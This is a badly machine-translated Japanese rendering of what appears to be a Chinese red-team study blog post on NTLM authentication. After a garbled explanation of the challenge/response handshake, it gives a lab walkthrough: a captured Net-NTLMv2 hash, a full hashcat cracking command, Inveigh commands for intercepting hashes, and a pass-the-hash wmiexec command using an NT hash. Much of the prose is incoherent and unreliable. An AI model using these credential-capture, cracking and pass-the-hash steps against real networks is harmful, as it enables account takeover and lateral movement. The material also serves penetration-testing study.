通常のテストでは、コンピュータは、多くの場合、信頼できる信頼関係を確立することができないコンピュータワーキンググループの間で、ワーキンググループに遭遇した、唯一の情報の送信を指すようにポイントすることができます。
例えば、Aは1つのアカウントがBをホストするために、ホストB上に存在する送信されます、成功した場合に受信した後、ローカルホストBによって検証され、ホストB上のリソースにアクセスしたいホストで、ホストを許可します対応するアクセス。
ここでは主にベースについて話していない挑战(Chalenge)/响应(Response)
前に、SMBプロトコルの認証機構のNTLMプロトコルので、それはもはやあまりにも多くの説明です。
NTLMプロトコルが基づいている挑战(Chalenge)/响应(Response)
認証メカニズム、Windowsのみのネットワーク認証プロトコルをサポートしています。
それは、交渉、問い合わせ、および3段階認証プロセスに分かれています
协商
このことは、このようなトランスポート・プロトコル・バージョンなどの情報をどのような種類を決定するために、後方互換性のために、両面で、履歴によって残った問題を解決することを目的とします。
质询
このステップは、以下の手順をここで紹介する、Chalenge /レスポンス認証機構のキーポイントです。
验证
お問い合わせの最終結果は、リソースへのアクセスを可能に検証、後に、検証を行って
**完全なプロセスの問題
まず、クライアントはサーバにユーザ名を送信します**、usernameは、ユーザーがサーバーに存在している上にあります。
**サーバーがこのメッセージを受信すると、それは最初にそこローカルユーザクエリがあり、そうでない場合ならば、直接バック認証が失敗し、存在する場合、16個のランダムな文字列を生成します、そのChalenge、その後、 ChalengeはChalenge1を生成する暗号化するために、ユーザーのNTLMハッシュを照会し、クライアントローカルに保存されChalenge1、およびChalengeを通過します。
**クライアントがChalenge、Chalengeすなわちレスポンス、レスポンスを暗号化してサーバに送信するために対応したユーザ名、送信NTLMハッシュを受信した場合。
**質問はここで終わって、最後のステップは、検証の機構の一部であります
**サーバはChalenge1との比較応答を受け取った後、同じ場合には、認証が成功しています
プロセスは次のように大まかです
最後に、最も大きな違いとNTLM V2プロトコルについて少し話、のNTLMv1がNTLM v2の暗号化アルゴリズムと異なるチャレンジがあり、暗号化は、一般的な原料はNTLMハッシュされている、NTLM V1はチャレンジの8を持って、チャレンジは、NTLM v2の16です; NTLM V1主暗号化アルゴリズムは、DES、メインNTLM v2の暗号化アルゴリズムはHMAC-MD5です。
私たちは、それらの間のデータ転送の実際のパケットキャプチャの状況を見て
server
192.168.5.133
LENOVO/123456
client
192.168.5.134
クライアント・サーバのリモート接続で
net use \\192.168.5.133 /u:LENOVO 123456
私たちは、キャプチャしたパケットを見て
これらの4つは交渉されるべき
4つのNTLM認証に対応した最初の4つのパケットの間に
私たちは、第2のパケットを開く、チャレンジが返さ得ました:d2165f1d10268dc0
第3のパケットは、クライアントの暗号化チャレンジを取得することができます参照してください。1b6943212ce6ccf2
応答データ
8582c1c1d54a7a430fc79a0abe09b4040101000000000000f29aefb85f5ad5011b6943212ce6ccf20000000002001e00570049004e002d0044004d0047004d0055004f005000510030003300310001001e00570049004e002d0044004d0047004d0055004f005000510030003300310004001e00570049004e002d0044004d0047004d0055004f005000510030003300310003001e00570049004e002d0044004d0047004d0055004f005000510030003300310007000800f29aefb85f5ad50106000400020000000800300030000000000000000100000000200000f4be3b3312dffac27687742d4f92263e5c1a37792d98c42fa6cd9200a6e15fa80a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0035002e00310033003300000000000000000000000000
そして、あなたはHashcatをクラックするためにそれらを使用することができます
NTLMv2のフォーマット:username::domain:challenge:HMAC-MD5:blob
***注:課題はNTLMServerチャレンジ、パケットの内容から(IPまたはマシン名)を得domian、HMAC-MD5、対応するデータパケットNTProofStrで、ブロブ応答が後半に対応するデータ・パケットを削除*** NTProofStr
だから、完全なデータはNTLMv2
LENOVO::WIN-DMGMUOPQ031:d2165f1d10268dc0:8582c1c1d54a7a430fc79a0abe09b404:0101000000000000f29aefb85f5ad5011b6943212ce6ccf20000000002001e00570049004e002d0044004d0047004d0055004f005000510030003300310001001e00570049004e002d0044004d0047004d0055004f005000510030003300310004001e00570049004e002d0044004d0047004d0055004f005000510030003300310003001e00570049004e002d0044004d0047004d0055004f005000510030003300310007000800f29aefb85f5ad50106000400020000000800300030000000000000000100000000200000f4be3b3312dffac27687742d4f92263e5c1a37792d98c42fa6cd9200a6e15fa80a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0035002e00310033003300000000000000000000000000
そして、あなたはhashcatを破ることができます
hashcat -m 5600 LENOVO::WIN-DMGMUOPQ031:d2165f1d10268dc0:8582c1c1d54a7a430fc79a0abe09b404:0101000000000000f29aefb85f5ad5011b6943212ce6ccf20000000002001e00570049004e002d0044004d0047004d0055004f005000510030003300310001001e00570049004e002d0044004d0047004d0055004f005000510030003300310004001e00570049004e002d0044004d0047004d0055004f005000510030003300310003001e00570049004e002d0044004d0047004d0055004f005000510030003300310007000800f29aefb85f5ad50106000400020000000800300030000000000000000100000000200000f4be3b3312dffac27687742d4f92263e5c1a37792d98c42fa6cd9200a6e15fa80a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0035002e00310033003300000000000000000000000000/root/123.list -o balabala.txt --force
-m:NetNTLMv2に対応するハッシュ型、5600、ルックアップテーブル詳細なパラメータます。https://hashcat.net/wiki/doku.php
-o:出力ファイル
/Root/123.list辞書ファイル
執行代表--force、テストシステムは、IntelのOpenCLをサポートしていません。
最後に、あなたはパスワードが正常に爆破された見ることができます
もちろん、実際のテスト環境では、我々が得るために、このメソッドを使用することはできません、あなたはネットNTLMhashを取得するために中間者攻撃を使用することができ、一般的に使用される2つのツールResponder
とInveigh
レスポンダ:pythonの書き込み
https://github.com/lgandx/Responder
Inveigh:PowerShellの書き込みを
https://github.com/Kevin-Robertson/Inveigh
私たちは、あなたがネットのNTLMv2ハッシュを取得することができ、我々は、コマンドラインを介して接続されている場合、クライアント上でInveighを実行します。
まず最初PowerShellを行っ
Import-Module .\Inveigh.psd1
Invoke-Inveigh -consoleoutput Y
このケースでは、ネットのNTLMv2ハッシュ送信をキャッチします
そして、それにクラック
我々は(ハッシュが渡される)、そのPTHを利用する方法があり、ひび割れすなわちハッシュを渡すことができないときただし、ハッシュは提供することができます不需要
クリアテキストの場合は、アカウントのパスワードの下で完全な認証をこの技術は、この技術を使用する場合、我々はまた、ユーザーのNTLMハッシュを必要としないだけ需要
のユーザー名を知っています。
ハッシュパス、完了するために、信頼の第三者認証なしでポイントを指すの欠点を利用しました
まずXianxiangサーバーがユーザー名を送信し、chanllengeを返すようにサーバーを待ち、その後、私たちは応答を生成NTLMハッシュchanllenge与えられた暗号化サーバに対応するユーザ名を使用して、認証を実行します。
ツールの使用かのように
以下のモジュールを持っている1.msf
exploit/windows/smb/psexec_psh
p番目のツールセットを持っている2.kali
3. Pythonベースwmiexecがあります。
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
注意:
プロンプトが表示されwmiexec.pyコメントは"Mainadvantage here is it runs under the user (has to be Admin) account"
実際の試験の通常のユーザー権限ですることができます
ハッシュパラメータ形式wmiexec.py LMHASH:NTHASH
、LMハッシュは任意の値に設定することができるにLMハッシュは、システムのデフォルトをサポートしていない場合
パラメータの例:
wmiexec -hashes00000000000000000000000000000000:7ECFFFF0C3548187607A14BAD0F88BB1TEST/[email protected] "whoami"
4. PowerShellはあり基づいています
https://github.com/Kevin-Robertson/Invoke-TheHash/
5. CSはまだそれは便利で速い最高の機能、付属しています感じなければなりません。
興味NTLMは、次の2件の記事を理解することを学ぶために行くことができる場合
http://davenport.sourceforge.net/ntlm.html
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
いいえ公共のデビュー記事ません:意図しないたわごと(wuxinmengyi)
これは、レコード赤チーム学習、校長ノート、公衆の個人的な成長の数であります
スキャンコードへの懸念